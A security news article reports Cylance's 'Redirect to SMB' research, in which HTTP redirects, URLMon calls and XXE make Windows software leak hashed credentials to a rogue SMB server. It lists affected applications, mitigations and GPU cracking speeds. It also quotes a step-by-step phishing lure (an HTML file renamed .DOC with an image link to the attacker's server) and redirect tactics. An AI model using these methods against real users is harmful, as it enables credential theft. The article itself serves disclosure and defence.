New methods expand the attack surface to applications and software beyond Windows.
SPEAR, the research team at Cylance, has discovered new attack vectors for an 18-year-old vulnerability in Windows Server Message Block (SMB). The updated attack vector, called Redirect to SMB, impacts products from Microsoft, Apple, Adobe, Symantec, Box, Oracle, and more.
In 1997, Aaron Spangler discovered a bug in Internet Explorerthat allowed attackers to steal credentials by exploiting a feature in the SMB protocol.
SMB is a core component in Windows networking, and enabled by default in all versions of the Windows OS.
Microsoft provided workarounds and difficult-to-implement GPO options after the flaw was initially disclosed, but never fully addressed the underlying problem. As things stand now, unless default settings in Windows are changed, systems remain vulnerable to these types of attack.
An SMB attack is one where a victim is tricked into following a link that causes the browser to authenticate to a remote SMB server (e.g. file://x.x.x.x or \\x.x.x.x\), which results in the attacker obtaining credentials for the user that’s currently logged in. The credentials are hashed, but they can be recovered given enough time, usually a few hours in most cases thanks to GPU-based cracking.
The Redirect to SMB attack discovered by SPEAR follows the original concepts developed by Spangler, but now the attack can target all vulnerable HTTP/HTTPS requests, including those made by browsers as well as applications attempting to access resources on the Web.
For this updated method to work, attackers would use a Web server under their control, or gain access to network traffic (Man-in-the-Middle) and force the user to authenticate to a rogue server running SMB. For example, online, the attackers could use a 301 or 302 status code, directing the browser to a resource that starts withfile://.
“Abusing network share paths (UNC) to steal and relay Windows credentials has been well-known for almost 20 years,” said HD Moore, Chief Research Officer at Rapid7, in a statement to Salted Hash.
“These techniques are often used by professional attackers (legit or otherwise) to gain initial access to an organization and to escalate privileges once they are on the internal network. Microsoft has provided a number of mitigations that have made these attacks slightly less effective, but overall, it is a design issue that is not likely to be fixed for quite some time.”
Next: So what’s vulnerable?
Internet Explorer has been vulnerable to the direct attack for nearly two decades, but it’s also vulnerable to the Redirect to SMB attack. The WebBrowser object in .NET is also vulnerable.
“If the target is not using Internet Explorer, things get a bit trickier. My favorite way around this is to take a document from the organization’s web site, save it as HTML, add an image link to my SMB server, rename the .HTML as .DOC, and email it as a ‘typo correction’ or ‘sales inquiry’ to various staff. When the users open the .DOC file, Word realizes its HTML, and then renders it with Internet Explorer, triggering the outbound connection to the SMB server. If the organization allows VPN access, the stolen/cracked credentials can then be used to access the corporate network,” Moore explained.
URLMon.dll, used by Microsoft and developers to perform various operations on URLs such as downloading files, has four functions that are vulnerable to both the direct attack from 1997 and the newest SMB attack. A fifth function is also vulnerable to the direct attack, but under normal circumstances, it isn’t vulnerable to the Redirect to SMB attack.
“If the application making this request calls one of the affected URLMon APIs, the machine will then make an outbound SMB connection. This significantly increases the effectiveness of man-in-the-middle attacks, even if the user isn’t actively doing anything on the system,” Moore added.
“I did a quick test by enabling HTTP tracing on my laptop, rebooting, and logging in. Over 100 different HTTP requests were made during that process, over half of which were not protected by SSL, and could be used to force an outbound SMB connection by a malicious attacker able to man-in-the-middle my traffic. Just resuming my laptop in a Starbucks would be enough to trigger this issue, which is a significance increase in exposure compared to an attacker having to wait for either Internet Explorer to be used or an outbound SMB connection to be made automatically.”
SPEAR also discovered that XXE (XML External Entities), a feature supported by many XML parsers, could be abused to access a remote resource, which makes it vulnerable to Redirect to SMB.
Their report also includes a list of possible attack vectors that could be leveraged in a Redirect to SMB setting, including direct Man-in-the-Middle, ARP cache poisoning, browser injection, the image preview option in many chat applications, malicious documents, and DNS cache poisoning.
“In cases where you can’t control the user’s behavior (visiting a link or opening an email), you need to be able to control the actual network,” Moore said.
“The problem with this approach is it depends on the user’s machine doing somethingin order to trigger a SMB authentication. This could be accessing a file share, a printer, or another automated task that triggers a SMB connection. This can be time consuming, since you basically have to wait the user out, or get lucky with a share connection, in order to accomplish this attack through a man-in-the-middle. Unless the user opens Internet Explorer or makes a SMB connection directly, there is no guarantee this attack will be of much use.”
Next: What software / applications are affected?
Widely Used Applications:
Apple Software Update (iTunes)
Windows Media Player
Microsoft Baseline Security Analyzer
Symantec’s Norton Security Scan
Github for Windows
JDK 8u31’s installer
“Any known vulnerable functions used by the software need to be replaced with functions that do not support cross protocol redirection…Access to SMB should be direct and filtered by the application. Disallowing any SMB requests outside of the local subnet, or at least requiring user verification, can limit the remote exploitation situations,” wrote Brian Wallace, the researcher who was in charge of this particular SPEAR project, in a paper on the topic.
“TCP port 139 and 445 should be blocked at the outbound firewall. If it is absolutely required that users access external SMB servers, access needs to be restricted as much as possible.”
The research paper also recommends the usage of strong passwords, which could help hinder cracking attempts. However, the advances in GPU-based password cracking has lowered the time needed to compute NTLMv2 hashes significantly. As such, the paper also recommends that administrators update their password policies over time to reflect the cost of hardware used to crack passwords.
“The oclHashcat website includes benchmarks for NetNTLMv2 using 8 x AMD R9 290X GPUs (each retails for about $300 to $700). It shows that with roughly $3000 worth of these GPUs, an attacker could make 6.496 billion guesses per second,” Wallace wrote.
“That means during a simple brute-force attack, an attacker would be able to guess every 8 character password consisting of letters (upper and lower case) and numbers in less than 9.5 hours. Given that password renewal policies are often required once a quarter; this gives the attackers a large amount of time to use those passwords.”
A copy of the full report from Cylance is available here.
“The RedirectToSMB attack is not an earth-shattering vulnerability, but it does demonstrate a novel approach to attacking passive client systems through a man-in-the-middle attack. On the surface, this attack doesn’t look like anything new at first, but it significantly increases the exploitability of Windows laptop and tablet users that connect to open WiFi networks. In terms of mitigations, all of the normal advice for preventing outbound SMB authentication applies,” Moore said.
Last year, Rapid7 worked with Microsoft and Palo Alto Networks to come up with specific guidance for protecting service accounts, Moore said that many of those would apply to this issue as well. A copy of their recommendations is available here.